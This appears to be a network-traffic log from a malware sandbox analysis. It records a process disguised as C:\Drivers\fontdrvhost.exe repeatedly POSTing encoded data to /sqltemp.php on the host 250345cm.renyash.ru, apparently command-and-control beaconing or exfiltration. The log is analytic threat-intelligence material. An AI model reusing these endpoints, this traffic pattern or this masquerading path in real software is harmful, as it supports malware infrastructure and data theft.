Jan 1, 2025 14:53:38.919564962 CET	1012	OUT	Data Raw: 53 52 5f 51 54 5c 51 52 58 56 52 59 56 5a 59 50 5b 5a 54 5f 55 54 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SR_QT\QRXVRYVZYP[ZT_UTP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3/-#/$.;D.:.78<9<=.+#7Z?+@1/'-:&Y.,Y--
Jan 1, 2025 14:53:39.037833929 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50142	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:39.159049034 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1812 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:39.511763096 CET	1812	OUT	Data Raw: 53 52 5f 50 54 5b 51 51 58 56 52 59 56 59 59 50 5b 5e 54 51 55 59 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SR_PT[QQXVRYVYYP[^TQUYP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0<940>(,\=R4-Z((=-' 7Y<]"%Y#V:&Y.,Y-
Jan 1, 2025 14:53:39.637530088 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:39.806339025 CET	956	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9du6hKP6GzFJN9olwwC%2FeD7XemDnrBhNflwQr2AK%2FPQ3pqQXeDUuuUgbzmg%2B0wysILowg9oAe4G4MCQRGOG7fwjHzxk0KQhlxRjuE4VFjaSPjF8J5WX%2FLJA8IRvhPxx0dmjBAVde"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff2e687c7d0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3439&min_rtt=1980&rtt_var=3661&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2131&delivery_rate=106928&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 1f 2a 13 31 09 31 31 38 59 3c 13 3b 1d 32 3d 22 11 3c 38 26 17 27 58 38 01 29 39 2b 1e 22 12 3e 06 31 28 24 10 37 03 01 12 24 34 2b 59 05 1c 20 45 22 2f 2f 00 28 2d 3b 5c 31 06 31 5d 33 2d 28 5c 28 16 02 1c 20 05 01 13 30 5b 3f 00 3d 04 2c 54 27 05 3c 05 3a 2f 07 53 27 10 2c 54 00 11 26 56 33 1f 3f 04 23 0e 20 5a 21 08 3d 13 24 27 29 0e 24 3c 0e 09 23 5f 3a 5d 32 0c 0e 01 36 33 25 03 31 3b 04 02 37 5b 23 52 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%*1118Y<;2="<8&'X8)9+">1($7$4+Y E"//(-;\11]3-(\( 0[?=,T'<:/S',T&V3?# Z!=$')$<#_:]263%1;7[#R=>%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50143	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:39.295392990 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:39.652348042 CET	1012	OUT	Data Raw: 53 52 5a 54 54 51 54 5d 58 56 52 59 56 5b 59 5e 5b 5a 54 50 55 54 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SRZTTQT]XVRYV[Y^[ZTPUTP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'!7<23>;D;7[?7(>$ (+;!28.&Y.,Y-)
Jan 1, 2025 14:53:39.749337912 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:39.922985077 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wk%2BhMbyvq0ZExj7ib98F9iJkg1TXJ3teKNYJRxYRddB90ROR42G2K7jkAsTpmcmn9RS611Zy%2FHcLW8SceMj2yztbaZYu6KOb9LYJ7a%2Bs4QBSH1eTPpJff%2BoFe9FYu9mYdL2mRktg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff2f2f940f83-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8265&min_rtt=1481&rtt_var=14124&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=26185&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50144	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:40.043499947 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:40.403585911 CET	1012	OUT	Data Raw: 56 53 5f 57 54 5d 54 50 58 56 52 59 56 5b 59 54 5b 53 54 5d 55 5c 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VS_WT]TPXVRYV[YT[ST]U\PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z'9#Y&'.4/1V [?('W>>4]#!(<A%??,:&Y.,Y-)
Jan 1, 2025 14:53:40.491209030 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:40.662498951 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORDMGz334LN0r2K91e7pK9Oh6e7YLfwxrvHH5qFp8XudCVJ6w2XUDfTR4eMPy2WsCHuZqYRE7Fz44N%2FHUYnNrwDGjo27n7NtQYdRY4Q3%2BxJ6LtWaTBPKw1yBJzc%2Btwzm%2F%2BP9TS57"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff33c98e41c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2351&min_rtt=1724&rtt_var=1900&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=216585&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50145	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:40.795845032 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:41.152379990 CET	1012	OUT	Data Raw: 56 50 5f 5c 51 5f 54 50 58 56 52 59 56 50 59 57 5b 5f 54 5f 55 5d 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_\Q_TPXVRYVPYW[_T_U]P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$/* !$>?,:-T ><[(9')'7\*+-C&?4.&Y.,Y-
Jan 1, 2025 14:53:41.250391006 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:41.526192904 CET	802	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXvLbGT47N1TfCWo1NM6Vxpt1AaBK6stHrgVuFF1Mq7lugjmOO2FNNVFz9RVk6Ob8KSH3q5wY0vNYLEqwJz%2FJDL18XDRApkWNXMmCL3852HQI9q2ZwDJJqm%2BaY1EQrVvQvnS1zQd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff388c94c34b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=1663&rtt_var=5670&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=66819&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50146	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:41.653513908 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:42.011959076 CET	1012	OUT	Data Raw: 56 5f 5f 57 54 51 54 51 58 56 52 59 56 5e 59 5f 5b 58 54 51 55 5d 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V__WTQTQXVRYV^Y_[XTQU]P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[35Z7?9\'=4.:" $Z?)$)>, 2#+)C%,(9:&Y.,Y-
Jan 1, 2025 14:53:42.096760035 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:42.272258043 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjBCH76NXmFH%2BKDeZehW6DVUy2JSMRIG8ssg7MtSr07inuRCmQeAG5gKx%2BcXY9aBqqGPuelTA8UoxPz4zHn3X6NFNKOWlA4Y1vILhx8H%2FjLEcYqSBN8qk8bgc6KHBVIUPGqESUhM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff3ddaf80f71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2376&min_rtt=1490&rtt_var=2331&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=170143&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50147	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:42.402839899 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:42.761868954 CET	1012	OUT	Data Raw: 56 50 5f 54 54 5a 54 51 58 56 52 59 56 5a 59 51 5b 5d 54 5a 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_TTZTQXVRYVZYQ[]TZUUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3/=7?3>3D.::4$<=(Y42$+&,;T-&Y.,Y--
Jan 1, 2025 14:53:42.880352020 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:43.039623022 CET	804	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ykf7w1jrM%2FuvAH6Vvz1J38SzbpHsmFN73P8aZ1bD14vF047KmGFH2geYprg%2FQc%2FOW3qN8XqqEAWudEbVnXh8EcadHIgow1kJzBtFOIseKUqLyfjIg3q4ZDkiIHzUEkRDbGavdnU2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff42ab33429b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4953&min_rtt=1669&rtt_var=7194&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=52251&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50148	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:43.167712927 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:43.511816025 CET	1012	OUT	Data Raw: 53 54 5a 54 54 51 54 5c 58 56 52 59 56 5b 59 52 5b 5c 54 5d 55 5e 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: STZTTQT\XVRYV[YR[\T]U^P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.36 /-]3?/7=;?* =. 7Y+5E%<$-:&Y.,Y-)
Jan 1, 2025 14:53:43.654556036 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:43.822580099 CET	811	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5QPWP6bKflU1%2Fmm330rkjlLjmfBumv2m06N7Np%2FxodWHX%2BhrMhhqsnAbSQceqT1O5P1puzQFrZXcy4fBopvDRqq%2FX84wY82pppYxK0ir55FDJA0%2F6E4aLRyUW1QU%2BY18TBtcw88"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff478e9f8cbf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3274&min_rtt=1975&rtt_var=3340&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=118008&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50149	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:43.950927973 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:44.309601068 CET	1012	OUT	Data Raw: 53 52 5f 51 54 51 54 5d 58 56 52 59 56 5d 59 56 5b 58 54 59 55 5a 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SR_QTQT]XVRYV]YV[XTYUZP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z'& .$>$82 X((>Y42+(>&?:&Y.,Y-1
Jan 1, 2025 14:53:44.423270941 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:44.668416977 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUQC8KvQzNWhIyfiObQFhwAd0bhwEjX0UFXAhBMF1pdu9LS51kuudkQoJjkU8O2%2Bok4C6kc%2B1XywJw6wz5F9rohz%2BT4PG7JvXhITNY2UWOw2VF0%2Bbo4S17wqJo%2B9jyv2E7WVftND"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff4c59d9422d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4744&min_rtt=1637&rtt_var=6829&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=55098&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50150	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:44.796705961 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50151	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:44.821763992 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:45.173615932 CET	1852	OUT	Data Raw: 53 53 5f 52 54 5d 54 5d 58 56 52 59 56 5c 59 53 5b 5c 54 51 55 58 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SS_RT]T]XVRYV\YS[\TQUXPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&,%]7<"0#A/)9 '(97W*<Z4!4<]"2<-&Y.,Y-5
Jan 1, 2025 14:53:45.275059938 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:45.529277086 CET	958	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=guh5ntGna0YB97rVb0u%2FTDHD64RhePkBPZwyXGytY2Wgwsk2ycUCl8oNPk7UhMI1g5Z9l9foY%2Bid9u9jNhdXCO%2F43UlKQ0a4yYlZvwEH0MepOO%2BsLaAJkedZfteGODR%2FM7iDhvwg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff51acbd1871-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3010&min_rtt=1506&rtt_var=3572&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=107844&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 12 29 2e 3d 0f 25 21 33 02 3c 13 3c 0f 27 2d 2e 59 3c 01 39 05 24 2e 02 00 29 29 24 00 36 5a 32 01 32 5e 2f 06 20 5b 2f 11 30 24 2b 59 05 1c 20 0b 21 3f 3c 13 3d 04 33 5c 31 59 36 00 33 00 06 14 2b 01 3c 56 23 28 33 1d 30 3e 27 04 2a 39 34 54 33 2c 3f 5c 3a 3c 2d 10 27 3a 2c 54 00 11 26 1e 27 57 28 15 22 37 0a 1f 36 08 29 13 25 34 2d 0a 25 02 02 0d 23 07 39 01 26 32 06 06 22 0d 2a 5a 31 05 3d 11 20 2d 37 18 3d 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%).=%!3<<'-.Y<9$.))$6Z22^/ [/0$+Y !?<=3\1Y63+<V#(30>'94T3,?\:<-':,T&'W("76)%4-%#9&2"Z1= -7=%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	50152	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:44.937788010 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
